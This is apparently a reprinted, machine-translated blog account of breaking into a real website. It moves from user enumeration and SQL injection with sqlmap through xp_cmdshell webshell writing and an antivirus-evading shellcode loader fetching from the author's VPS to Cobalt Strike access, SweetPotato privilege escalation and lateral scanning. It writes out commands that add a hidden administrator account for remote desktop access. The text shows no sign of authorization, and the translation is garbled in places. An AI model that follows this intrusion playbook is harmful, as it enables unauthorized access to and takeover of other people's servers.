Title: Record an attack on the penetration of the spinach website

We found a background with a QP background framework with vulnerabilities

There are many loopholes in this framework, such as user traversal. If we enter an existing user, if the password is incorrect, it will prompt the user or password if the password is incorrect. If we enter an non-existent user, it will prompt the user not exists.

In addition, there will be SQL injection vulnerabilities on the website. We only need to grab a POST package to submit the account password.

Paste a txt document and throw it into SQLmap.

It is mssql, we can enable xp_cmdshell, here we plan to write to webshell, so first os-shell determines the path (super slow)

Then use xp_cmdshell to write to webshell

was successfully launched

Then I planned to go online to cs for the next operation, and tried web delivery, but was stopped by Killer

It's very annoying, there's no way, I can only try to go online without killing. The method I use here is to separate without killing.

Generate payload, then write a shellloader and compile it at base64.

I put shellcode on vps

Upload shellloader to target

One, two, three are online!

That's right, the low-powered user did not succeed in trying to escalate power many times, but in the end sweetpotato won it

Get my favorite system

Add a user

net user admin$ admin@123 /add to add to the administrator group

net localgroup administrators test /add direct 3389 connection

I originally planned to scan the remote desktop with FScan, but I found that the IP of the intranet is different from usual. After scanning, I found that many hosts appeared, so I judged that this was a VPS, so I penetrated it until it was.

Reprinted from the original link: https://mp.weixin.qq.com/s/ch3zcIlUPpZ8tjCJttwarQ